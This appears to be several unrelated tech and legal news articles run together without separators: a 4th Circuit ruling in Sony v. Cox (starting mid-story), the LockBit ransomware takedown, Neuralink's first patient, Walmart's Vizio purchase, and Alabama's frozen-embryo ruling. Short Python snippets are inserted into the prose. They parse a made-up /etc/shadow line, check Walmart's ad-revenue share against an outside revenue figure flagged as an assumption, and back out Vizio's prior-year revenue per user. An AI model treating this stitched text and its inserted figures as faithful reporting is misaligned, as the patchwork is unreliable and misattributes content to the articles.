“We affirm the jury’s finding of willful contributory infringement,” said a unanimous decision by a three-judge panel at the US Court of Appeals for the 4th Circuit. “But we reverse the vicarious liability verdict and remand for a new trial on damages because Cox did not profit from its subscribers’ acts of infringement, a legal prerequisite for vicarious liability.”

If the correct legal standard had been used in the district court, “no reasonable jury could find that Cox received a direct financial benefit from its subscribers’ infringement of Plaintiffs’ copyrights,” judges wrote.

The case began when Sony and other music copyright holders sued Cox, claiming that it didn’t adequately fight piracy on its network and failed to terminate repeat infringers. A US District Court jury in the Eastern District of Virginia found the ISP liable for infringement of 10,017 copyrighted works.

Copyright owners want ISPs to disconnect users

Cox’s appeal was supported by advocacy groups concerned that the big-money judgment could force ISPs to disconnect more Internet users based merely on accusations of copyright infringement. Groups such as the Electronic Frontier Foundation also called the ruling legally flawed.

“When these music companies sued Cox Communications, an ISP, the court got the law wrong,” the EFF wrote in 2021. “It effectively decided that the only way for an ISP to avoid being liable for infringement by its users is to terminate a household or business’s account after a small number of accusations—perhaps only two. The court also allowed a damages formula that can lead to nearly unlimited damages, with no relationship to any actual harm suffered. If not overturned, this decision will lead to an untold number of people losing vital Internet access as ISPs start to cut off more and more customers to avoid massive damages.”

In today’s 4th Circuit ruling, appeals court judges wrote that “Sony failed, as a matter of law, to prove that Cox profits directly from its subscribers’ copyright infringement.”

A defendant may be vicariously liable for a third party’s copyright infringement if it profits directly from it and is in a position to supervise the infringer, the ruling said. Cox argued that it doesn’t profit directly from infringement because it receives the same monthly fee from subscribers whether they illegally download copyrighted files or not, the ruling noted.

The question in this type of case is whether there is a causal relationship between the infringement and the financial benefit. “If copyright infringement draws customers to the defendant’s service or incentivizes them to pay more for their service, that financial benefit may be profit from infringement. But in every case, the financial benefit to the defendant must flow directly from the third party’s acts of infringement to establish vicarious liability,” the court said.

After years of losing, it’s finally feds’ turn to troll ransomware group

LOOK WHO’S TROLLING NOW —

Authorities who took down the ransomware group brag about their epic hack.

Getty Images

After years of being outmaneuvered by snarky ransomware criminals who tease and brag about each new victim they claim, international authorities finally got their chance to turn the tables, and they aren’t squandering it.

The top-notch trolling came after authorities from the US, UK, and Europol took down most of the infrastructure belonging to LockBit, a ransomware syndicate that has extorted more than $120 million from thousands of victims around the world. On Tuesday, most of the sites LockBit uses to shame its victims for being hacked, pressure them into paying, and brag of their hacking prowess began displaying content announcing the takedown. The seized infrastructure also hosted decryptors victims could use to recover their data.

The dark web site LockBit once used to name and shame victims, displaying entries such as “press releases,” “LB Backend Leaks,” and “LockbitSupp You’ve been banned from Lockbit 3.0.”

this_is_really_bad

Authorities didn’t use the seized name-and-shame site solely for informational purposes. One section that appeared prominently gloated over the extraordinary extent of the system access investigators gained. Several images indicated they had control of /etc/shadow, a Linux file that stores cryptographically hashed passwords. This file, among the most security-sensitive ones in Linux, can be accessed only by a user with root, the highest level of system privileges.
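The shadow file is a plain-text database with one colon-separated line per account. A minimal illustration of the format, using a fabricated entry rather than real hashes:

```python
# A made-up line in /etc/shadow format: username, password hash, then
# password-aging fields (last change, min/max age, warning period, etc.)
sample = "root:$6$examplesalt$examplehash:19750:0:99999:7:::"
fields = sample.split(":")
user, password_hash = fields[0], fields[1]

# The "$6$" prefix identifies a SHA-512 crypt hash
print(user, password_hash.startswith("$6$"))  # → root True
```

Anyone who can read these hashes can attack them offline, which is why screenshots of the file made such an effective taunt.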

Screenshot showing a folder named “shadow” with hashes for accounts including “root,” “daemon,” “bin,” and “sys.”

Other images demonstrated that investigators also had complete control of the main web panel and the system LockBit operators used to communicate with affiliates and victims.

Screenshot of a panel used to administer the LockBit site.

Screenshot showing chats between a LockBit affiliate and a victim.

The razzing didn’t stop there. The images had file names including “this_is_really_bad.png,” “oh dear.png,” and “doesnt_look_good.png.” The seized page also teased the upcoming doxing of LockbitSupp, the moniker of the main LockBit figure. It read: “Who is LockbitSupp? The $10m question” and displayed images of cash wrapped in chains with padlocks. Copying a common practice of LockBit and competing ransomware groups, the seized site displayed a clock counting down the seconds until the identifying information would be posted.

Screenshot showing “who is lockbitsupp?”

In all, authorities said they seized control of 14,000 accounts and 34 servers located in the Netherlands, Germany, Finland, France, Switzerland, Australia, the US, and the UK. Two LockBit suspects have been arrested in Poland and Ukraine, and five indictments and three arrest warrants have been issued. Authorities also froze 200 cryptocurrency accounts linked to the ransomware operation.

“At present, a vast amount of data gathered throughout the investigation is now in the possession of law enforcement,” Europol officials said. “This data will be used to support ongoing international operational activities focused on targeting the leaders of this group, as well as developers, affiliates, infrastructure, and criminal assets linked to these criminal activities.”

LockBit has operated since at least 2019 under the name “ABCD.” Within three years, it was the most widely circulating ransomware. Like most of its peers, LockBit operates under what’s known as ransomware-as-a-service, in which it provides software and infrastructure to affiliates who use it to compromise victims. LockBit and the affiliates then divide any resulting revenue. Hundreds of affiliates participated.

According to KrebsOnSecurity, one of the LockBit leaders said on a Russian-language crime forum that a vulnerability in the PHP scripting language provided the means for authorities to hack the servers. That detail led to another round of razzing, this time from fellow forum participants.

“Does it mean that the FBI provided a pen-testing service to the affiliate program?” one participant wrote, according to reporter Brian Krebs. “Or did they decide to take part in the bug bounty program? :):).”

Several members also posted memes taunting the group about the security failure.

“In January 2024, LockBitSupp told XSS forum members he was disappointed the FBI hadn’t offered a reward for his doxing and/or arrest, and that in response he was placing a bounty on his own head—offering $10 million to anyone who could discover his real name,” Krebs wrote. “‘My god, who needs me?’ LockBitSupp wrote on January 22, 2024. ‘There is not even a reward out for me on the FBI website.’”

Musk claims Neuralink patient doing OK with implant, can move mouse with brain

Neuralink brain implant —

Medical ethicists alarmed by Musk being “sole source of information” on patient.

A person’s hand holding a Neuralink brain implant, a device about the size of a coin.

Neuralink

Neuralink co-founder Elon Musk said the first human to be implanted with the company’s brain chip is now able to move a mouse cursor just by thinking.

“Progress is good, and the patient seems to have made a full recovery, with no ill effects that we are aware of. Patient is able to move a mouse around the screen by just thinking,” Musk said Monday during an X Spaces event, according to Reuters.

Musk’s update came a few weeks after he announced that Neuralink implanted a chip into the human. The previous update was also made on X, the Musk-owned social network formerly named Twitter.

Musk reportedly said during yesterday’s chat, “We’re trying to get as many button presses as possible from thinking. So that’s what we’re currently working on is: can you get left mouse, right mouse, mouse down, mouse up… We want to have more than just two buttons.”

Neuralink itself doesn’t seem to have issued any statement on the patient’s progress. We contacted the company today and will update this article if we get a response.

“Basic ethical standards” not met

Neuralink’s method of releasing information was criticized last week by Arthur Caplan, a bioethics professor and head of the Division of Medical Ethics at NYU Grossman School of Medicine, and Jonathan Moreno, a University of Pennsylvania medical ethics professor.

“Science by press release, while increasingly common, is not science,” Caplan and Moreno wrote in an essay published by the nonprofit Hastings Center. “When the person paying for a human experiment with a huge financial stake in the outcome is the sole source of information, basic ethical standards have not been met.”

Caplan and Moreno acknowledged that Neuralink and Musk seem to be “in the clear” legally:

Assuming that some brain-computer interface device was indeed implanted in some patient with severe paralysis by some surgeons somewhere, it would be reasonable to expect some formal reporting about the details of an unprecedented experiment involving a vulnerable person. But unlike drug studies in which there are phases that must be registered in a public database, the Food and Drug Administration does not require reporting of early feasibility studies of devices. From a legal standpoint Musk’s company is in the clear, a fact that surely did not escape the tactical notice of his company’s lawyers.

But they argue that opening “the brain of a living human being to insert a device” should have been accompanied with more public detail. There is an ethical obligation “to avoid the risk of giving false hope to countless thousands of people with serious neurological disabilities,” they wrote.

A brain implant could have complications that leave a patient in worse condition, the ethics professors noted. “We are not even told what plans there are to remove the device if things go wrong or the subject simply wants to stop,” Caplan and Moreno wrote. “Nor do we know the findings of animal research that justified beginning a first-in-human experiment at this time, especially since it is not lifesaving research.”

Clinical trial still to come

Neuralink has been criticized for alleged mistreatment of animals in research and was reportedly fined $2,480 for violating US Department of Transportation rules on the movement of hazardous materials after inspections of company facilities last year.

People “should continue to be skeptical of the safety and functionality of any device produced by Neuralink,” the nonprofit Physicians Committee for Responsible Medicine said after last month’s announcement of the first implant.

“The Physicians Committee continues to urge Elon Musk and Neuralink to shift to developing a noninvasive brain-computer interface,” the group said. “Researchers elsewhere have already made progress to improve patient health using such noninvasive methods, which do not come with the risk of surgical complications, infections, or additional operations to repair malfunctioning implants.”

In May 2023, Neuralink said it obtained Food and Drug Administration approval for clinical trials. The company’s previous attempt to gain approval was reportedly denied by the FDA over safety concerns and other “deficiencies.”

In September, the company said it was recruiting volunteers, specifically people with quadriplegia due to cervical spinal cord injury or amyotrophic lateral sclerosis. Neuralink said the first human clinical trial for PRIME (Precise Robotically Implanted Brain-Computer Interface) will evaluate the safety of its implant and surgical robot, “and assess the initial functionality of our BCI [brain-computer interface] for enabling people with paralysis to control external devices with their thoughts.”

Walmart buying TV-brand Vizio for its ad-fueling customer data

About software, not hardware —

Deal expected to close as soon as this summer.

Close-up of Vizio logo on a TV

Walmart announced an agreement to buy Vizio today. Irvine, California-based Vizio is best known for lower-priced TVs, but its real value to Walmart is its advertising business and access to user data.

Walmart said it’s buying Vizio for approximately $2.3 billion, pending regulatory clearance and additional closing conditions. Vizio can also terminate the transaction over the next 45 days if it accepts a better offer, per the announcement.

Walmart will keep selling non-Vizio TVs should the merger close, Seth Dallaire, Walmart US’s EVP and CRO who would manage Vizio post-acquisition, told The Wall Street Journal (WSJ).

Walmart expects the acquisition to be finalized as soon as this summer, it told WSJ.

Ad-pportunity

Walmart, including Sam’s Club, is typically Vizio’s biggest customer by sales, per a WSJ report last week on the potential merger. But Walmart’s acquisition isn’t about getting a bigger piece of the budget-TV market (Walmart notably already sells its own “onn.” budget TVs). Instead, Walmart is looking to boost its Walmart Connect advertising business.

Vizio makes money by selling ads, including those shown on its SmartCast OS and on the free, ad-supported content available on its TVs. Walmart said buying Vizio will give it new ways to appeal to advertisers, and that those ad efforts would be further fueled by Walmart’s high-volume sales of TVs.

Walmart said today that Vizio’s Platform+ ad business has “over 500 direct advertiser relationships, including many of the Fortune 500” and that SmartCast users have grown 400 percent since 2018 to 18 million active accounts.

Walmart Connect (which was rebranded from Walmart Media Group in 2021) sells various types of ads, including adverts that appear on Walmart’s website and app. Walmart Connect also sells ads that display on in-store screens, including display TVs and point-of-sale machines, in over 4,700 locations (Walmart has over 10,500 stores).

Walmart makes most of its US revenue from low-profit groceries, WSJ noted last week, but ads are higher profit. Walmart has said that it wants Walmart Connect to be a top-10 advertising business. Alphabet, Amazon, and Meta are among the world’s biggest advertising companies today. In the fiscal year ending January 2023, Walmart said that its global ads business represented under 1 percent ($2.7 billion) of its total annual revenue. In its fiscal year 2024 Q4 earnings report released today [PDF], Walmart said its global ad business grew 33 percent, including 22 percent in the US, compared to Q4 2023.
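As a sanity check on the “under 1 percent” figure: Walmart’s total revenue for the fiscal year ending January 2023 was roughly $611 billion, a number from Walmart’s public filings that is not stated in the article.

```python
# Ad revenue as a share of total revenue, both in billions of dollars
ad_revenue = 2.7
total_revenue = 611.3  # assumption: FY2023 total from Walmart's filings
share = ad_revenue / total_revenue
print(f"{share:.2%}")  # → 0.44%
```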

Hungry for customer data

Owning Platform+ would give Walmart new information about TV users. Data gathered from Vizio TVs will be combined with data on shoppers that Walmart already gets. Walmart plans to use this customer data to sell targeted ad space, such as banners above Walmart.com search results, and to help advertisers track ad results.

With people only able to buy so many new TVs, vendors have been pushing for ways to make money off of already-purchased TVs. That means putting ads on TV OSes and TVs that gather customer data, including what users watch and which ads they click on, when possible. TV makers like Vizio, Amazon, and LG are increasingly focusing on ads as revenue streams.

Meanwhile, retailers like Walmart are also turning to ads for revenue. Through Vizio, Walmart is looking to add a business with the vast majority of gross profit coming from ads. Data acquired through SmartCast can shed light on ad effectiveness and improve ad targeting, Vizio tells advertisers.

In an interview with WSJ, Dallaire noted that smart TVs and streaming have turned the TV business into a software business, not a hardware one. According to a spokesperson for Parks Associates that Ars Technica spoke with, Vizio has 12 percent of connected TV OS market share. WSJ reported last week that Roku OS has more market share at 25 percent, though a graph that Parks Associates’ rep sent to me suggests the percentage is smaller (Parks Associates’ spokesperson wouldn’t confirm Roku OS’ market share or the accuracy of WSJ’s report to Ars). Roku OS is on Walmart’s “onn.” TVs, but Walmart doesn’t own Roku.

Vizio TVs could get worse

From the perspective of a company seeking to grow its ad business, buying Vizio seems reasonable. But from a user perspective, Vizio TVs risk becoming too centered on selling and measuring ads.

There was already a large financial incentive for Vizio to focus on growing Platform+ and the profitability of SmartCast (in its most recent earnings report, Vizio said its average revenue per SmartCast user increased 14 percent year over year to $31.55). For years, Vizio’s business has been more about selling ads than selling TVs. An acquisition focused on ads can potentially detract from a focus on improving Vizio hardware.
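From the two figures in Vizio’s report, you can back out the prior year’s average revenue per SmartCast user:

```python
# $31.55 per SmartCast user after 14% year-over-year growth
current_arpu = 31.55
growth = 0.14
previous_arpu = current_arpu / (1 + growth)
print(f"${previous_arpu:.2f}")  # → $27.68
```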

Stuffing more ads into TVs could also ruin the experience for people seeking a quality TV at a lower cost. While some people may be willing to sacrifice features and image quality to save money, others aren’t willing to accept more ads and incessant viewer tracking in the bargain. With Vizio expected to become part of a conglomerate eager to grow its ad business, it’s possible that the ads experience on Vizio TVs could worsen.

Editor’s note: This article was edited to include information from Parks Associates. 

Frozen embryos are “children,” according to Alabama’s Supreme Court

frozen cell balls —

IVF often produces more embryos than are needed or used.

January 17, 2024, Berlin: In the cell laboratory at the Fertility Center Berlin, an electron microscope is used to fertilize an egg cell.

The Alabama Supreme Court on Friday ruled that frozen embryos are "children" entitled to full personhood rights, and that anyone who destroys them could be liable in a wrongful death case.

The first-of-its-kind ruling throws into question the future of assisted reproductive technology (ART) involving in vitro fertilization for patients in Alabama and beyond. With this technology, people who want children but face challenges conceiving can create embryos in clinical settings; those embryos may or may not go on to be implanted in a uterus.

In the Alabama case, a hospital patient wandered through an unlocked door, removed frozen, preserved embryos from subzero storage, and, after suffering an ice burn, dropped the embryos, destroying them. Affected IVF patients filed wrongful-death lawsuits against the IVF clinic under the state's Wrongful Death of a Minor Act. The case was initially dismissed in a lower court, which ruled the embryos did not meet the definition of a child. But the Alabama Supreme Court reversed, ruling that the Act "applies to all children, born and unborn, without limitation." In a concurring opinion, Chief Justice Tom Parker cited his religious beliefs and quoted the Bible to support the stance.

“Human life cannot be wrongfully destroyed without incurring the wrath of a holy God, who views the destruction of His image as an affront to Himself,” Parker wrote. “Even before birth, all human beings bear the image of God, and their lives cannot be destroyed without effacing his glory.”

In 2020, the US Department of Health and Human Services estimated that there were over 600,000 embryos frozen in storage around the country, a significant percentage of which will likely never result in a live birth.

The process of IVF generally goes like this: First, egg production is overstimulated with hormone treatments. Then, doctors harvest the eggs as well as sperm. The number of eggs harvested can vary, but doctors sometimes try to retrieve as many as possible, ranging from a handful to several dozen, depending on fertility factors. The harvested eggs are fertilized in a clinic, sometimes by combining them with sperm in an incubator or by the more delicate process of directly injecting sperm into a mature egg (intracytoplasmic sperm injection). Any resulting fertilized eggs may then go through additional preparations, including “assisted hatching,” which prepares the embryo’s membrane for attaching to the lining of the uterus, or genetic screening to ensure the embryo is healthy and viable.

Feared reality

This process sometimes yields several embryos, which is typically considered good because each round of IVF can have significant failure rates. According to national ART data collected by the Centers for Disease Control and Prevention, the percentage of egg retrievals that fail to result in a live birth ranges from 46 percent to 91 percent, depending on the patient’s age. The percentage of fertilized egg or embryo transfers that fail to result in a live birth ranges from 51 percent to 76 percent, depending on age. Many patients go through multiple rounds of egg retrievals and embryo transfers.

The whole IVF process often creates numerous embryos but leads to far fewer live births. In 2021, nearly 240,000 patients in the US had over 400,000 ART cycles, resulting in 97,000 live-born infants, according to the CDC.

People who have extra embryos from IVF can currently choose what to do with them, including freezing them for more cycles or future conception attempts, donating them to others wanting to conceive, donating them to research, or having them discarded.

But if embryos are legally considered "children," as Alabama's Supreme Court ruled, any embryos destroyed or discarded during IVF or afterward could become the subject of wrongful death lawsuits. The ruling creates potentially paralyzing liability for ART clinics and the patients who use them. Doctors may choose to create embryos only one at a time to avoid the liability attached to creating extras, or they may decline to provide IVF altogether to avoid liability when embryos do not survive the process. This could exacerbate the already financially draining and emotionally exhausting process of IVF, potentially putting it entirely out of reach for those who want to use the technology and putting clinics out of business.

Barbara Collura, CEO of RESOLVE: The National Infertility Association, told USA Today that the ruling would likely halt most IVF work in Alabama. “This is exactly what we have been fearful of and worried about where it was heading,” Collura said. “We are extremely concerned that this is now going to happen in other states.”

But the hypothetical risks don't end there. Health advocates worry that the idea of personhood for an embryonic ball of a few cells could extend to pregnancy outcomes such as miscarriages, or even to the use of contraceptives.
